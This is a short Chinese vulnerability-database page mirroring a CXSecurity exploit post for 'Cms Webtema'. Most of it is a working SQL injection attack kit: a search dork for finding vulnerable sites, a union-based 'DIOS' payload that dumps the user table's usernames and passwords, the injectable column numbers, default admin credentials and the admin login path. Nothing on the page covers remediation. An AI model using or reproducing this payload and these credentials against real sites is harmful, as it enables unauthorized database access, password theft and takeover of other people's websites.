SQL-i Cms Webtema - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1803596 漏洞类型
发布时间 2019-10-30 更新时间 2019-10-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019100187
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: SQL Injection Cms Webtema
# Date: 2019-10-30
# Author: MarsHall // AnarchoXploit
#Dork : 
- intext:Designed by webtema.id
#Dios : '+union+select+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user,0x203a3a20,pass,0x3c62723e))))x),3,4,5,6,7,8--+-

#Number magic : 2,4
#U/p default : admin2@webedu.id / 12345678
#Adlog : /admin/login/index.html